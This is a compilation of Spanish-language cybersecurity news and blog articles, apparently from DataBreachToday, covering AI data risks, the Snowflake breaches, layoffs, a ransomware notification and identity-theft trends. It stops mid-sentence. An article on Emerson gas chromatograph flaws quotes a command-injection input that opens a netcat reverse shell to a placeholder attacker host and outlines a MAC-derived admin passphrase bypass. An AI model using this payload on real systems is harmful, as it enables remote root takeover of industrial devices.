Inteligencia artificial y aprendizaje automático, gobernanza y gestión de riesgos, liderazgo y comunicación ejecutiva Qué hacer para proteger los datos confidenciales que envía a las herramientas de inteligencia artificial en línea CyberEdBoard • 28 de junio de 2024 Ian Keller, director de seguridad y miembro ejecutivo de CyberEdBoard Las herramientas de inteligencia artificial son una bendición y una maldición para las empresas. Permiten que el personal sea más eficiente y realice las tareas más rápido, pero también permiten que una cantidad cada vez mayor de datos confidenciales salgan de la organización. Los datos que se trasladan a la IA para su análisis pueden crear una pesadilla legal y contractual para las empresas. Ver también: Identity Security Clinic ChatGPT y Gemini de Google operan bajo un modelo freemium, que ofrece a los usuarios una funcionalidad básica. Las funciones más avanzadas están bloqueadas detrás de un muro de pago. Al igual que el software libre, estas herramientas en línea tienen acuerdos de licencia vagos y poco amigables para el usuario, y dentro de estos acuerdos hay cláusulas que otorgan al proveedor derechos relacionados con los datos enviados. Estas son las tres cuestiones principales que suelen encontrarse en los acuerdos de licencia o de uso. El proveedor tiene derecho a utilizar sus datos para la formación y la mejora de sus productos. El proveedor puede incorporar los datos de su empresa a sus plataformas de formación sin mayor permiso ni contraprestación. Esto puede beneficiar los productos del proveedor y también puede exponer potencialmente los datos confidenciales de su empresa a los algoritmos subyacentes. El proveedor tiene derecho a utilizar sus datos para análisis de datos y marketing. El riesgo aquí es que los datos que usted envía podrían agregarse con datos de otros usuarios para revelar tendencias de la industria o permitir que los competidores obtengan información sobre sus estrategias. El acuerdo de licencia permite compartir con terceros. Esto podría permitir que el proveedor comparta sus datos con afiliados o proveedores externos, lo que ampliaría aún más el círculo de quienes tienen acceso a su información confidencial. Consecuencias de enviar datos confidenciales a herramientas de inteligencia artificial Los riesgos inherentes a las cláusulas del acuerdo de licencia/uso plantean serias preocupaciones sobre su cumplimiento contractual y legal, particularmente con las regulaciones de privacidad de datos. El Reglamento General de Protección de Datos aborda el principio de minimización de datos. Exige que las empresas solo recopilen y procesen la cantidad mínima de datos necesarios para un propósito específico. Enviar datos de la empresa a una herramienta de inteligencia artificial para una tarea no esencial contradice directamente este principio. Si envía información de identificación personal a una plataforma de inteligencia artificial sin consentimiento expreso, su empresa puede correr un grave riesgo de incumplimiento del RGPD. Dice que una empresa puede recibir una multa de hasta 20 millones de euros o el 4% de su facturación global anual, lo que sea mayor, por esta infracción. Las consecuencias de una violación de datos causada por el suministro de información confidencial a una herramienta de inteligencia artificial van mucho más allá de las multas regulatorias. Su empresa sufrirá daños a la reputación como resultado de una filtración de datos, lo que provocará una pérdida de clientes y una disminución del valor de la marca. Y los clientes nuevos y existentes pueden dudar en confiar información confidencial a una empresa con un historial de filtraciones. Si los datos de los clientes se ven comprometidos a través de una herramienta de inteligencia artificial, la empresa también podría enfrentar acciones legales por parte de personas afectadas y/o de organismos reguladores que buscan alguna forma de restitución por los daños sufridos. Gestión de riesgos para herramientas de IA Es necesario implementar controles de gestión de riesgos cuando se envían datos confidenciales a herramientas de IA. Las buenas prácticas de higiene de seguridad son esenciales. Incluyen: Una política de clasificación de datos y capacitación de concientización asociada: eduque a sus empleados sobre la clasificación de datos y la importancia de identificar información confidencial. Esto reducirá en gran medida el riesgo de incumplimiento. Enviar correos electrónicos periódicos que contengan información y orientación fáciles de leer es una manera sencilla de lograrlo. Una lista de proveedores de IA examinados: si la IA es una necesidad empresarial, investigue exhaustivamente a los posibles proveedores de IA, examine sus acuerdos de licencia y dé prioridad a aquellos con prácticas de seguridad sólidas y políticas claras de uso de datos. Ponga esta lista a disposición de todo el personal y manténgala actualizada. También puede considerar desarrollar soluciones internas de IA. Esto es especialmente beneficioso cuando se pueden utilizar tareas de alto riesgo que involucran datos confidenciales o PII. Las soluciones internas de IA le permiten mantener el control de sus datos completamente dentro de su organización. La tecnología de IA seguirá creciendo y evolucionando, por lo que la cuestión de la seguridad de los datos es primordial. La Ley de IA de la UE es un paso en la dirección correcta (ver: El Parlamento de la UE aprueba la Ley de Inteligencia Artificial). Siempre hay un costo asociado con las herramientas y la IA no es una excepción. Asegúrese de comprender completamente los riesgos asociados con la IA y otras herramientas en línea, e implemente estrategias sólidas de mitigación específicas para el negocio. CyberEdBoard es la principal comunidad exclusiva para miembros de ISMG compuesta por altos ejecutivos y líderes de opinión en los campos de seguridad, riesgo, privacidad y TI. CyberEdBoard ofrece a los ejecutivos un poderoso ecosistema colaborativo impulsado por pares, reuniones privadas y una biblioteca de recursos para abordar desafíos complejos compartidos por miles de CISO y líderes senior de seguridad ubicados en 65 países diferentes en todo el mundo. Únase a la comunidad: CyberEdBoard.io. Solicite membresía Ian Keller tiene más de tres décadas de experiencia en seguridad de la información. Actualmente, aprovecha su amplio conocimiento y experiencia para cerrar la brecha entre la inteligencia de telecomunicaciones corporativas y la comunicación empresarial, brindando soluciones basadas en datos para la toma de decisiones informadas y mejorando la calidad del producto en línea con ISO y las mejores prácticas. Keller es un director de seguridad de la información cuya carrera ha abarcado sectores que incluyen telecomunicaciones, seguridad de redes, servicios financieros, consultoría y atención médica. Su experiencia en seguridad del cliente, gestión de identidades y acceso, seguridad de la información y concienciación sobre la seguridad lo ha convertido en un orador muy solicitado en eventos internacionales. URL de la publicación original: https://www.databreachtoday.com/blogs/on-point-risk-management-strategies-for-ai-tools-p-3655
Etiqueta: La violación de datos hoy
Ciberdelincuencia, gestión de fraude y ciberdelincuencia, autenticación multifactorial y basada en riesgos El robo de datos de los clientes de Snowflake muestra que los proveedores necesitan defensas sólidas Mathew J. Schwartz (euroinfosec) •28 de junio de 2024 Imagen: Shutterstock ¿Quién es responsable de las violaciones de datos experimentadas por clientes de la plataforma de almacenamiento de datos Snowflake? Ver también: Clínica de seguridad de identidad La versión corta de cómo se desarrolló este ataque se puede explicar en dos palabras: relleno de credenciales. Esto se refiere a tomar nombres de usuario (a menudo direcciones de correo electrónico) y pares de contraseñas de una filtración de datos públicos o privados y probarlos en una variedad de otros sitios para ver dónde podrían funcionar. En un informe conjunto sobre las violaciones de datos, Mandiant y CrowdStrike, que fueron contratados para ayudar con la respuesta a incidentes, dijeron que los atacantes crearon una herramienta, elegantemente llamada «rapeflake» (ahora rastreada por Mandiant de Google como «Frostbite») para automatizar este proceso. Se violaron varias cuentas de clientes de Snowflake y algunas víctimas recibieron demandas de rescate por los datos robados. Los investigadores dicen que unas 165 organizaciones se han visto afectadas. Si bien la mayoría no ha sido nombrada públicamente, las víctimas conocidas incluyen el Banco Santander, el proveedor de repuestos para automóviles Advance Auto Parts, el Distrito Escolar Unificado de Los Ángeles y el minorista de lujo Neiman Marcus. Otra víctima, Ticketmaster de Live Nation Entertainment, en su última notificación de violación de datos dijo que la violación de su cuenta Snowflake comenzó el 2 de abril y fue descubierta el 23 de mayo. El informe conjunto de Snowflake publicado a principios de este mes dice: «No hemos identificado evidencia que sugiera que esta actividad fue causado por una vulnerabilidad, mala configuración o violación de la plataforma de Snowflake”. «El entorno empresarial de Snowflake no ha sido violado», dijo un portavoz. El CISO de Snowflake, Brad Jones, dijo en una publicación de blog: «Creemos que esto es el resultado de ataques continuos basados en la identidad en toda la industria con la intención de obtener datos de los clientes». Pregunta sobre responsabilidad Entonces, ¿quién es responsable cuando los ataques de relleno de credenciales resultan en violaciones de datos? «Es difícil definir proporciones de responsabilidad, pero lo que está claro es que la seguridad es una responsabilidad conjunta», dijo el experto en violación de datos Troy Hunt, fundador del sitio gratuito Have I Been Pwned? Servicio de notificación de incumplimiento. «Si las credenciales se obtuvieron por deficiencias en nombre del cliente, entonces eso es responsabilidad de ellos, pero igualmente, las plataformas como Snowflake deben trabajar bajo el supuesto de que estos ataques son comunes y brindan resistencia contra ellos». Una triste realidad para una organización cuyas cuentas de clientes son violadas en un ataque de este tipo es que a menudo se les considera responsables, al menos en la percepción del público. Los ataques de intercambio de credenciales han sido comunes durante años, y los aficionados intercambian regularmente listas de relleno de credenciales en foros de piratería. ¿Qué debería hacer una organización para demostrar que hizo todo lo posible para combatir el relleno de credenciales? Hunt, que durante mucho tiempo ha asesorado a empresas sobre las defensas necesarias, me dijo que para él, un enfoque moderno incluiría «una combinación de controles que incluyan el bloqueo de contraseñas violadas conocidas, la antiautomatización y el reconocimiento de comportamientos anómalos en los intentos de autenticación». Aquí está mi lista más completa de defensas sugeridas: Apoyar una MFA sólida. La Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. afirma que «la MFA ‘resistente al phishing’, como una tarjeta inteligente o una clave de seguridad FIDO, es el estándar de oro de la protección de MFA», y los usuarios siempre deben utilizar «el nivel más fuerte de MFA que puedan». Pero MFA no resolverá todo, especialmente «cuando hablamos de claves utilizadas para comunicarse entre la aplicación y la plataforma en la nube», dijo Hunt. Hacer obligatoria la MFA. Brinde a los administradores la capacidad de exigir que sus usuarios empleen MFA sólida y resistente al phishing. Rechazar contraseñas reutilizadas. Alrededor de 2016, sitios como Facebook y Netflix comenzaron a hacer caducar por la fuerza las contraseñas de los usuarios si descubrían que los clientes las reutilizaban en otro sitio. Revisan continuamente las filtraciones de datos en busca de dicha información. Bloquear contraseñas reutilizadas. En 2017, Hunt lanzó el servicio gratuito Pwned Passwords que los sitios pueden usar para ayudar a los usuarios a nunca elegir una contraseña que haya aparecido en una violación de datos conocida, poco después de que el Instituto Nacional de Estándares y Tecnología de EE. UU. comenzara a recomendar esa práctica. Combatir comportamientos sospechosos. La advertencia de Per Hunt de monitorear el «comportamiento anómalo de los intentos de autenticación» y bloquear volúmenes altos o inusuales de solicitudes o actividades de inicio de sesión, que podrían ser atacantes que utilizan herramientas maliciosas como Frostbite. Verificar clientes. MFA no protegerá todos los tipos de conexión, como a través de API o directamente a bases de datos. “En estas situaciones se necesitan mejores controles para verificar la legitimidad del cliente que consume el servicio”, dijo Hunt. A raíz de que aproximadamente 165 clientes de Snowflake vieron que sus datos de Snowflake desaparecían debido a ataques de relleno de credenciales, la plataforma de almacenamiento de datos prometió perfeccionar su enfoque para MFA y defensas basadas en red. Snowflake actualmente admite solo un tipo de MFA: Cisco Duo, «y solo esa instancia administrada por Snowflake», dijo la compañía, aunque en agosto pasado dijo que estaba considerando agregar otras opciones. Cada usuario debe autoinscribirse en este MFA y los clientes no pueden hacer que el uso de MFA sea obligatorio. Duo se puede utilizar para autenticarse no solo en la interfaz web de Snowflake, Snowsight, y su herramienta de interfaz de línea de comandos, sino también con SnowSQL de la compañía y los controladores Snowflake JDBC y ODBC. Snowflake también admite una variedad de proveedores compatibles con SAML para el inicio de sesión único. Okta y Microsoft Active Directory Federation Services ofrecen soporte nativo, además de OAuth y el uso de una clave de hardware criptográfica que genera un par de claves. «Para cuentas de servicio (es decir, casos de uso interactivos no humanos), utilice autenticación de par de claves u OAuth para la comunicación de máquina a máquina en lugar de credenciales estáticas», dijo Snowflake. No está claro si el acceso a cualquiera de estas funciones genera costos adicionales de Snowflake; El proveedor no respondió de inmediato a mi solicitud de comentarios. Mandiant dijo que el hecho de que no todos los usuarios de los clientes de Snowflake emplearan MFA fue un factor en las violaciones de datos. «El amplio impacto de esta campaña subraya la necesidad urgente de monitoreo de credenciales, la aplicación universal de MFA y autenticación segura, limitando el tráfico a ubicaciones confiables para las joyas de la corona y alertando sobre intentos de acceso anormales», dijo. Snowflake ha prometido ofrecer a los clientes MFA adicional y otras opciones. «Estamos desarrollando un plan para exigir a nuestros clientes que implementen controles de seguridad avanzados, como autenticación multifactor o políticas de red», dijo el lunes. Idealmente, la empresa también comenzará a respaldar el estándar de oro de MFA resistente al phishing que defiende CISA. Debido a que los vendedores y proveedores de servicios almacenan datos pertenecientes a sus clientes o en nombre de ellos, deberían buscar MFA resistente al phishing de forma predeterminada, además de controles de seguridad adicionales para bloquear ataques de relleno de credenciales perpetrados por API u otras vías. Cualquier cosa menos, los proveedores corren el riesgo de sufrir las inevitables violaciones de datos de los clientes que se producirán a continuación. URL de la publicación original: https://www.databreachtoday.com/blogs/breaches-due-to-credential-stuffing-whos-accountable-p-3656
Los recortes de empleo en los proveedores de servicios de seguridad gestionados (MSSP) se producen menos de dos meses después de que la empresa propiedad de WillJam Ventures cambiara su nombreMichael Novinson (MichaelNovinson) • 28 de junio de 2024 LevelBlue despidió al 15 % de su plantilla de 1000 personas tan solo unos meses después de que AT&T vendiera una participación mayoritaria en la empresa de servicios de ciberseguridad gestionados a WillJam Ventures. Ver también: Nuevo OnDemand | Datto presenta: El estado de MSP La empresa con sede en Dallas dijo que los recortes permitirán a LevelBlue reorientar sus recursos en mejorar la profundidad, la calidad y la entrega de sus servicios de seguridad gestionados, y agregó que sigue contratando en áreas que están mejor alineadas con las necesidades de socios y clientes. La reducción de la plantilla se produce menos de dos meses después de que la empresa cambiara su nombre de AT&T Cybersecurity y debutara como LevelBlue (ver: LevelBlue aprovecha la inteligencia artificial para obtener información sobre amenazas tras la división de AT&T). “LevelBlue ha decidido reestructurar nuestras operaciones comerciales para apoyar la misión de nuestra empresa de simplificar la ciberseguridad para las empresas”, dijo la empresa en un comunicado. “Estamos agradecidos por las contribuciones de todos los miembros de nuestro equipo, pasados y presentes, en la construcción de LevelBlue como un líder global en la industria de servicios de seguridad gestionados”. Los despidos de LevelBlue fueron informados por primera vez en X por el analista principal gerente de Omdia, Eric Parizo, y fueron confirmados por la empresa a Information Security Media Group. AT&T dijo en noviembre que trasladaría su software de seguridad, operaciones de seguridad gestionadas y recursos de consultoría de seguridad a una empresa conjunta de propiedad mayoritaria de WillJam, y AT&T mantendría una posición minoritaria. Despidos: un duro despertar para una empresa recién lanzada Varios ex empleados de LevelBlue han publicado en LinkedIn en los últimos días sobre la pérdida de sus trabajos, incluidas personas que ocupaban puestos de gestión de productos y desarrollo empresarial y tenían experiencia en áreas como seguridad de pagos, fraude, gestión de identidad y acceso, cortafuegos y servicio de acceso seguro. También hay una serie de hilos recientes en TheLayoff.com sobre los recortes de empleo en LevelBlue. El director ejecutivo de LevelBlue desde abril ha sido Bob McCullen, quien también es el fundador y líder de WillJam. Dirigió Trustwave de 2005 a 2015, cuando fue adquirida por el conglomerado de telecomunicaciones Singtel por 770 millones de dólares. Bajo las órdenes de McCullen como presidente de LevelBlue está Sundhar Annamalai, quien se reincorporó a AT&T como presidente y director de tecnología de su negocio de ciberseguridad en agosto de 2022 después de pasar 18 meses en Humana (ver: AT&T forma una empresa conjunta para el negocio de ciberseguridad administrada). WillJam también es propietario del proveedor de servicios de seguridad PCI VikingCloud, así como del proveedor de detección y respuesta administradas GoSecure. Según IT-Harvest, VikingCloud aumentó su plantilla en más del 80% hasta los 557 trabajadores durante los más de tres años de McCullen como presidente de la junta directiva, mientras que la plantilla de GoSecure se redujo un 3% hasta los 183 trabajadores entre principios de 2021 y noviembre de 2023, cuando McCullen dejó la junta. McCullen dijo a ISMG el mes pasado que quiere hacer crecer el negocio de LevelBlue fuera de los Estados Unidos de solo el 10% actual al 30% dentro de un par de años invirtiendo en relaciones directas con los clientes. Dijo que LevelBlue también buscará adquisiciones para fortalecer su pila de tecnología, respaldar y mejorar sus ofertas de plataformas en la nube y expandir su presencia geográfica. Los grandes proveedores globales de seguridad administrada siguen teniendo dificultades Gran parte del conocimiento en ciberseguridad de AT&T proviene de su compra por 600 millones de dólares del proveedor de inteligencia de amenazas AlienVault en agosto de 2018. Barmak Meftah, presidente y director ejecutivo de AlienVault desde hace mucho tiempo, asumió el cargo de líder de la unidad de negocios de soluciones de ciberseguridad recién formada de AT&T, pero se fue en julio de 2020 y cofundó la firma de capital de riesgo Ballistic Ventures en enero de 2022 (ver: ¿Por qué AT&T Cybersecurity es un objetivo de adquisición tan bueno?). Muchos proveedores de servicios de seguridad administrada globales puros han tenido dificultades en los últimos años a medida que los clientes optan por tecnologías más nuevas o enfoques diferentes. La filial de capital privado de la firma de asesoría del exsecretario de Seguridad Nacional Michael Chertoff compró Trustwave en enero por 205 millones de dólares, lo que significa que la empresa perdió casi tres cuartas partes de su valor durante el tiempo que estuvo bajo la propiedad de Singtel. La plantilla de Trustwave ha caído un 19% a 1.152 trabajadores entre principios de 2020 y hoy. HelpSystems (ahora Fortra) acordó comprar Alert Logic en marzo de 2022, y la plantilla de la empresa se desplomó un 62% hasta los 248 trabajadores entre enero de 2020 y hoy. Y Secureworks (cuya participación mayoritaria es de Dell) ha visto caer su plantilla un 35% hasta las 1.760 personas durante el mismo período, según ha descubierto IT-Harvest. URL de la publicación original: https://www.databreachtoday.com/levelblue-despedirá-a-15-empleados-tras-ser-vendida-por-att-a-25653
Notificación de infracción,Gestión de fraude y delitos cibernéticos,Atención médica InfoSys McCamish Systems alertó anteriormente a 57.000 clientes de Bank of America por una infracciónMarianne Kolbasuk McGee (HealthInfoSec) •28 de junio de 2024 Imagen: Infosys McCamish Systems Infosys McCamish Systems, un proveedor de servicios y productos de software de seguros, está notificando Casi 6,1 millones de personas fueron víctimas de un incidente de ransomware en 2023 que potencialmente afectó sus datos confidenciales, incluidos números de Seguro Social, tratamiento médico e información financiera y biométrica. Ver también: SASE unificado: la tercera era de la seguridad de la red IMS le dijo al fiscal general de Maine en un informe el jueves que el incidente de piratería, descubierto el 2 de noviembre de 2023, afectó a alrededor de 6,08 millones de personas, incluidos 11.866 residentes de Maine. IMS, que es una subsidiaria de InfoSys BPM Limited con sede en Atlanta, presentó un aviso ante la Comisión de Bolsa y Valores de EE. UU. el 3 de noviembre de 2023 para informar un incidente de ciberseguridad que involucraba la “no disponibilidad” de ciertos sistemas y aplicaciones IMS. En un aviso publicado en su sitio web, IMS dijo que el 2 de noviembre de 2023, la compañía se enteró de que ciertos sistemas IMS estaban cifrados por ransomware. «Ese mismo día, IMS comenzó una investigación con la asistencia de expertos en ciberseguridad externos, contratados a través de abogados externos, para determinar la naturaleza y el alcance de la actividad, ayudar con la contención y garantizar que no se realice ninguna actividad no autorizada», dice el comunicado. IMS también dijo que notificó de inmediato a las autoridades. La compañía dijo que desde entonces el incidente ha sido contenido y remediado. Una investigación forense cibernética determinó que se produjo actividad no autorizada entre el 29 de octubre y el 2 de noviembre de 2023. En febrero, IMS informó al fiscal general de Maine que el incidente afectó al cliente Bank of America y a unos 57.000 clientes del plan de compensación diferida (ver: Hack en Empresa de servicios de software afecta a 57.000 clientes de BoA). Desde entonces, la investigación en curso de IMS y la “revisión exhaustiva y que requiere mucho tiempo de los datos en cuestión” identificaron el alcance de la información personal que estaba sujeta a acceso y adquisición no autorizados, según el último informe de violación de la compañía a los reguladores de Maine. «IMS procesa datos en nombre de varias organizaciones como parte de la prestación de operaciones de mercado corporativo y empresarial para sus clientes», dice el aviso de infracción. “IMS ha notificado a aquellos clientes cuyos datos fueron objeto de acceso y adquisición no autorizados. Cuando se considera que IMS es el propietario de los datos, IMS está en el proceso de informar a las personas cuya información personal estuvo sujeta a acceso y adquisición no autorizados”. La investigación de la compañía determinó que los datos comprometidos en el incidente incluyen número de Seguro Social, fecha de nacimiento, tratamiento médico e información de registros, datos biométricos, dirección de correo electrónico y contraseña, número de licencia de conducir o número de identificación estatal, información de cuenta financiera, información de tarjeta de pago, número de pasaporte, número de identificación tribal y número de identificación militar de EE. UU. IMS dijo que no tiene conocimiento de ningún caso desde el incidente en el que la información personal afectada de las personas haya sido utilizada de manera fraudulenta. No obstante, IMS ofrece a las personas afectadas 24 meses de seguimiento gratuito de identidad y crédito. La firma dijo que también ha tomado medidas para reducir la probabilidad de que ocurra un evento similar en el futuro. «Continuamos realizando mejoras adicionales que fortalecen nuestra postura de ciberseguridad», dijo IMS en su aviso de incumplimiento. Litigios pendientes IMS ya se enfrenta a al menos dos demandas colectivas federales propuestas, que en mayo se consolidaron en un caso presentado en el Tribunal de Distrito de EE. UU. para el Distrito Norte de Georgia, relacionado con el incidente de piratería informática. Esas demandas fueron presentadas en marzo y mayo por dos demandantes que son clientes de Bank of America afectados por la infracción. La demanda en el caso consolidado alega, entre otras reclamaciones, que IMS fue negligente al no salvaguardar la información confidencial de identificación personal de los demandantes y miembros del grupo. La demanda busca daños financieros, así como medidas cautelares que exijan a IMS mejorar sus prácticas y controles cibernéticos, incluida la implementación y el mantenimiento de un programa integral de seguridad de la información. Un abogado que representa a IMS en su último informe de violación al fiscal general de Maine no respondió de inmediato a la solicitud de Information Security Media Group de información adicional sobre el incidente, incluido cuántos otros clientes, además de Bank of America, se vieron afectados por el ataque. La semana pasada, IMS informó que sus ingresos disminuyeron por primera vez en ocho años, cayendo un 4,3% a 442 millones de dólares en el año finalizado el 31 de diciembre de 2023. La compañía dijo que resolver el ciberataque disruptivo costó 30 millones de dólares, según un informe de Indian Medio de noticias de negocios LiveMint. URL de la publicación original: https://www.databreachtoday.com/insurance-software-vendor-notifies-61-million-2023-hack-a-25654
Seguridad de endpoints, gobernanza y gestión de riesgos, seguridad de Internet de las cosas Las fallas de gravedad crítica exponen los dispositivos de Emerson a ciberataquesPrajeet Nair (@prajeetspeaks) • 28 de junio de 2024 Imagen: Shutterstock Varias vulnerabilidades críticas en los cromatógrafos de gases de Emerson podrían permitir que actores maliciosos accedan a datos confidenciales, provoquen condiciones de denegación de servicio y ejecuten comandos arbitrarios. Ver también: SASE: Reconocer los desafíos de proteger una fuerza de trabajo híbrida Los cromatógrafos de gases, que se utilizan para analizar y separar compuestos químicos, son herramientas integrales en varias industrias, incluidos los sectores químico, ambiental y de atención médica. El Emerson Rosemount 370XA, un modelo ampliamente utilizado, se basa en un protocolo propietario para la comunicación entre el dispositivo y la computadora del técnico. Los investigadores de seguridad de Team82, de la firma de seguridad de tecnología operativa Claroty, identificaron cuatro vulnerabilidades clave: dos fallas de inyección de comandos, una omisión de autenticación y una vulnerabilidad de autorización. Una falla de inyección de comandos recibió una puntuación CVSS v3 de 9,8, lo que indica su gravedad crítica. La vulnerabilidad, identificada como CVE-2023-46687, es una vulnerabilidad de ejecución de código remoto no autenticado o inyección de comandos que se encuentra en la implementación del tipo de comando de «calibración forzada». La vulnerabilidad está vinculada a una función del sistema que se llama con un comando de shell construido e incluye un nombre de archivo proporcionado por el usuario, sin la limpieza adecuada. Esto permite a un atacante inyectar comandos de shell arbitrarios. El atacante puede explotar esto proporcionando una entrada diseñada como gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, que da como resultado la ejecución de código arbitrario en el contexto del shell raíz. Otra vulnerabilidad, identificada como CVE-2023-51761, es una vulnerabilidad de omisión de autenticación que permite a un atacante omitir la autenticación calculando una frase de contraseña secreta para restablecer la contraseña de administrador. La frase de contraseña se deriva de la dirección MAC del dispositivo, que no es información secreta y se puede obtener fácilmente. Al comprender el procedimiento de validación de la frase de contraseña, un atacante puede generar la frase de contraseña utilizando la dirección MAC e iniciar sesión con privilegios de administrador utilizando credenciales con el formato EMERSON/{PASSPHRASE}. La vulnerabilidad identificada como CVE-2023-49716 es una omisión del inicio de sesión del usuario a través de un mecanismo de restablecimiento de contraseña. Esta vulnerabilidad permite a un usuario no autenticado con acceso a la red omitir la autenticación y adquirir capacidades de administrador. La última vulnerabilidad abordada se identifica como CVE-2023-43609 y es una inyección de comandos a través de la funcionalidad de reinicio. Esta falla permite a un usuario autenticado con acceso a la red ejecutar comandos arbitrarios desde una computadora remota. Debido al alto costo y la dificultad de obtener un dispositivo físico, los investigadores emularon el Emerson Rosemount 370XA para su análisis. Identificaron fallas en la implementación del protocolo del dispositivo, lo que les permitió crear cargas útiles y descubrir las vulnerabilidades. La vulnerabilidad de omisión de autenticación, por ejemplo, permitió a los atacantes calcular una frase de contraseña secreta y restablecer las contraseñas de administrador, comprometiendo la seguridad del sistema. Emerson recomendó en un aviso de seguridad que los usuarios finales actualicen el firmware de los productos. La Agencia de Seguridad de Infraestructura y Ciberseguridad también ha publicado un aviso sobre las fallas. URL original de la publicación: https://www.databreachtoday.com/multiple-vulnerabilities-found-in-gas-chromatographs-a-25655
Finanzas y banca, gestión de fraude y delitos cibernéticos, fraude de identidad James E. Lee de ITRC analiza las tendencias clave reveladas en el informe de identidad de 2023 Anna Delaney (annamadeline) •27 de junio de 2024 James E. Lee, director de operaciones, Centro de recursos contra el robo de identidad Menos víctimas informaron su identidad delitos en 2023, pero el número de intentos de cometer múltiples delitos de identidad aumentó, según el informe de tendencias publicado por el Centro de recursos sobre robo de identidad. Eso significa que los delincuentes están diversificando sus métodos e intentando realizar múltiples tipos de uso indebido. Ver también: Seminario web | Todo lo que puede hacer para combatir la ingeniería social y el phishing «Hemos visto menos víctimas denunciar abusos de identidad», afirmó James E. Lee, director de operaciones del Centro de recursos contra el robo de identidad. “Sin embargo, el número de intentos de uso indebido ha aumentado, lo que indica medidas más proactivas por parte de las víctimas potenciales. Esta tendencia sugiere que, si bien los delitos contra la identidad en general están disminuyendo, los delincuentes están diversificando sus métodos e intentando múltiples tipos de abusos”. El nuevo informe descubre varias tendencias importantes: los informes de empleo falso aumentaron un 117% y las estafas laborales aumentaron un 118%, impulsados por herramientas de inteligencia artificial que hacen que las estafas sean más convincentes. El uso indebido delictivo de PII para evitar arrestos u órdenes judiciales creció un 23%. Los intentos de uso indebido de identidad relacionados con cuentas financieras crecieron un 11%. Lee enfatizó la importancia de la vigilancia organizacional. “No importa el tamaño, las organizaciones son objetivos. Proteger los datos es crucial ya que los delitos de identidad pueden provocar violaciones organizativas importantes”. En esta entrevista en video con Information Security Media Group, Lee analizó: La persistente amenaza de estafas utilizando números de Google Voice; Por qué las filtraciones de datos son el punto de partida de muchos delitos de identidad; La necesidad de que las organizaciones capaciten a los empleados para reconocer y prevenir ataques de ingeniería social. Lee, un veterano en tecnología y protección de datos, es ex vicepresidente ejecutivo y secretario de la empresa irlandesa de seguridad de aplicaciones Waratek y ex vicepresidente senior y director de marketing de ChoicePoint, pionero de datos con sede en Atlanta, ahora LexisNexis. Presidió dos grupos de trabajo del Instituto Nacional Estadounidense de Estándares sobre gestión de identidad y privacidad. Antes de unirse a ChoicePoint, Lee se desempeñó como ejecutivo de comunicaciones y asuntos públicos globales en International Paper Co. URL de la publicación original: https://www.databreachtoday.com/identity-theft-reports-fall-but-attempts-at-id- mal uso-rise-a-25640
Certificaciones profesionales y capacitación continua, estrategia de reclutamiento y recapacitación, capacitación y liderazgo en seguridad Cómo comprender las tendencias de contratación puede impulsar su carrera en ciberseguridadBrandy Harris •26 de junio de 2024 Imagen: Getty Images El viaje para asegurar una carrera en ciberseguridad a menudo puede resultar desalentador. La búsqueda de empleo puede ser frustrante ya que muchos currículums se pierden o llegan a un callejón sin salida. Pero aprender a comprender el mercado laboral actual de ciberseguridad y las tendencias de la industria puede ayudarlo a alcanzar sus objetivos profesionales de manera más eficiente. Ver también: Clínica de seguridad de identidad ¿Por qué seguir las tendencias de contratación? Mantenerse actualizado sobre las tendencias de contratación en ciberseguridad es importante porque le ayuda a: Orientar su búsqueda de empleo. Concéntrese en los puestos que los empleadores buscan activamente, lo que aumenta sus posibilidades de ser contratado. Desarrollar habilidades. Adapte su educación y capacitación para satisfacer las necesidades del mercado, lo que lo convertirá en un candidato más competitivo. Obtenga una ventaja competitiva. Obtenga información sobre los últimos desarrollos de la industria, lo que le permitirá mantenerse por delante de otros solicitantes de empleo. Avanza en tu carrera. Identifique oportunidades de crecimiento y roles emergentes, lo que le ayudará a guiar su trayectoria profesional de forma eficaz. Qué preguntas hacer Demanda de roles específicos ¿Cuáles son los títulos de trabajo más importantes? Identifique los puestos más buscados, por ejemplo, analista de seguridad, ingeniero de seguridad de redes, probador de penetración y director de seguridad de la información. ¿Cuáles son los roles emergentes? Busque nuevos roles, por ejemplo, especialista en seguridad en la nube, ingeniero de DevSecOps y científico de datos de ciberseguridad. Tendencias específicas de la industria ¿Cuáles son las demandas específicas del sector? Realice investigaciones para saber qué industrias están contratando activamente profesionales de ciberseguridad (por ejemplo, finanzas, atención médica, gobierno y tecnología). ¿Cuáles son las influencias regulatorias? Conozca las regulaciones de la industria que pueden impulsar la demanda de profesionales de ciberseguridad (por ejemplo, GDPR, HIPAA y CCPA). Perspectivas y predicciones futuras ¿Cuáles son las proyecciones de crecimiento? Realice investigaciones para descubrir predicciones sobre el crecimiento futuro del mercado laboral de ciberseguridad y qué áreas se espera que se expandan. ¿Cuál es el impacto tecnológico? Mantenga un registro de cómo las tecnologías emergentes (por ejemplo, IA, aprendizaje automático y blockchain) están influyendo en qué funciones de ciberseguridad se necesitan y qué habilidades se requieren. Dónde encontrar respuestas Asociaciones profesionales y grupos industriales ISC2: El Consorcio Internacional de Certificación de Seguridad de Sistemas de Información proporciona información valiosa a través de sus informes y documentos técnicos. ISACA: La Asociación de Control y Auditoría de Sistemas de Información ofrece publicaciones de investigación y encuestas sobre tendencias de la industria. Instituto SANS: Conocido por su capacitación y certificaciones, SANS publica informes sobre las tendencias de la fuerza laboral en ciberseguridad. Informes de investigación e industria ISMG: Information Security Media Group ofrece investigación y educación para profesionales de seguridad y tomadores de decisiones de alto nivel. Estudio de la fuerza laboral en ciberseguridad realizado por ISC2: este informe anual proporciona datos completos sobre las tendencias de la fuerza laboral, las brechas de habilidades y las prácticas de contratación. Bolsas de trabajo y sitios web de carreras Indeed, Glassdoor y LinkedIn: revise periódicamente las ofertas de trabajo en estas plataformas para ver qué habilidades y cualificaciones están en demanda. CyberSecJobs.com: consulte esta bolsa de trabajo para puestos de ciberseguridad para identificar tendencias en los requisitos y títulos laborales. Seminarios web y conferencias en línea Conferencia RSA: RSAC, una de las conferencias de ciberseguridad más importantes, ofrece sesiones sobre tendencias de la fuerza laboral y prácticas de contratación. Black Hat y DEF CON: estas conferencias a menudo incluyen temas sobre desarrollo profesional y tendencias de la industria. Seminarios web impartidos por líderes de la industria: empresas como CyberEd.io, Cisco, Palo Alto Networks y CrowdStrike organizan con frecuencia seminarios web sobre las tendencias de la industria. Grupos de reuniones de networking y participación comunitaria: únase a reuniones locales de ciberseguridad para establecer contactos con profesionales y conocer las tendencias de contratación locales. Foros en línea: participe en debates en 